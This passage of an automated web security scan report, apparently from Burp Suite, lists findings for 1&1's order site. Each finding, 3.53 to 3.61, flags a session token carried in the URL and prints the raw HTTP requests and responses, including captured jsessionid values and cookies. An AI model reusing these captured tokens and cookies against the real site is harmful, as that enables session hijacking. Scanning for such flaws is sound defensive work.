Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:47:13 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=pbWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC0wKy4vKCk=; Expires=Fri, 07-Apr-2079 22:01:20 GMT; Path=/
ETag: 9de78ef384b1a75fd3107fb41be3e05d
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 27882


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<div id="header"><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkId=hd.log.eue&amp;site=PU.WH.US&amp;origin.page=FeatureSite-buildingCnba&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.log.eue" rel="redirectlink-hd-log-eue"><img alt="1&amp;1 Internet AG" id="header_logo" src="/modules/frontend-skin-odin/img/frontend-skin-odin/header/logo_1and1.png" class="alphapng">
...[SNIP]...
<li class="dropdown left first_item"><a class="core_button_normal" href="/xml/order/Home;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.nav.home" rel="button-hd-nav-home">Home</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Domains</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.nav.domainSearch" rel="button-hd-nav-domainSearch">Domain Search</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/DomaininfoMove;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.nav.domainTransfer" rel="button-hd-nav-domainTransfer">Domain Transfer</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Mail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailInstantMail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Instant Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailXchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">1&amp;1 MailXchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MicrosoftExchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft&reg; Exchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Linux Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MsHosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkId=ngh&amp;site=PU.NGH.US&amp;origin.page=FeatureSite-buildingCnba&amp;page=switch&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=ngh" rel="redirectlink-ngh">
MyBusiness Site
</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Eshops;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">eCommerce</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Server;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.nav.server" rel="button-hd-nav-server">Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">1&amp;1 Dedicated Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">
1&amp;1 Dynamic Cloud Server
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">1&amp;1 Virtual Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/LocalSubmission;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.nav.listlocal" rel="button-hd-nav-listlocal">ListLocal</a></li><li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.nav.sharepoint" rel="button-hd-nav-sharepoint">Microsoft&reg; Sharepoint&reg;</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.tab.packageselection" rel="button-hd-tab-packageselection"><span>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/domaincheck;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.tab.chooseadomain" rel="button-hd-tab-chooseadomain"><span>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/eshopupselling;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.tab.packageselection" rel="button-hd-tab-packageselection"><span>
...[SNIP]...
<li style="float:right;"><a class="auswahl" href="/xml/order/costs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.tab.yourcart" rel="button-hd-tab-yourcart" title="Ihre Auswahl im &Uuml;berblick (Warenkorb)"><span>
...[SNIP]...
</div><a rel="blank" class="target" href="/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">To 1&amp;1 Linux Web Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/AboutUs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.nav.about" rel="button-hd-nav-about">
About 1&amp;1
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkId=ft.nav.pressroom&amp;site=ST.PRE.US&amp;origin.page=FeatureSite-buildingCnba&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=ft.nav.pressroom" rel="redirectlink-ft-nav-pressroom">
Press Room
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Gtc;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=ft.nav.tandc" rel="button-ft-nav-tandc">
T&amp;C
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/PrivacyPolicy;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=ft.nav.privacypolicy" rel="button-ft-nav-privacypolicy">
Privacy Policy
</a>
...[SNIP]...
<li><a rel="height=512, width=683" class="window-open" href="/xml/order/TellAFriend;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=ft.nav.tellafriend&amp;linkType=txt">
Tell a friend
</a>
...[SNIP]...

3.53. http://order.1and1.com/xml/order/FeatureSite-buildingCnba

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingCnba

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureSite-buildingCnba;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:47:13 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=pbWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC0wKy4vKCk=; Expires=Fri, 07-Apr-2079 22:01:20 GMT; Path=/
ETag: 9de78ef384b1a75fd3107fb41be3e05d
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 27882


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

3.54. http://order.1and1.com/xml/order/FeatureSite-buildingContentmoduls

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingContentmoduls

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureSite-buildingContentmoduls;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:43:22 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingContentmoduls?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.55. http://order.1and1.com/xml/order/FeatureSite-buildingDriving

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingDriving

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureSite-buildingDriving;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:43:45 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingDriving?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.56. http://order.1and1.com/xml/order/FeatureSite-buildingDsc

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingDsc

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureSite-buildingDsc;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:42:15 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingDsc?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.57. http://order.1and1.com/xml/order/FeatureSite-buildingElements

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingElements

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureSite-buildingElements;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:43:13 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingElements?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.58. http://order.1and1.com/xml/order/FeatureSite-buildingMailinglist

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingMailinglist

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureSite-buildingMailinglist;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:45:23 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingMailinglist?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.59. http://order.1and1.com/xml/order/FeatureSite-buildingMap

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingMap

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureSite-buildingMap;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:43:34 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingMap?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.60. http://order.1and1.com/xml/order/FeatureSite-buildingNet

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingNet

Issue detail

The URL in the request carries a session token, here as a ;jsessionid= path parameter rather than a query-string value. A token in the URL is exposed to proxy and server logs, browser history and the Referer header sent to any linked site; note that the server answered with a 301 whose Location omits the token:

Request

GET /xml/order/FeatureSite-buildingNet;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:42:06 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingNet?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.61. http://order.1and1.com/xml/order/FeatureSite-buildingPhotogallery

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingPhotogallery

Issue detail

The URL in the request carries a session token, here as a ;jsessionid= path parameter rather than a query-string value. A token in the URL is exposed to proxy and server logs, browser history and the Referer header sent to any linked site; note that the server answered with a 301 whose Location omits the token:

Request

GET /xml/order/FeatureSite-buildingPhotogallery;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
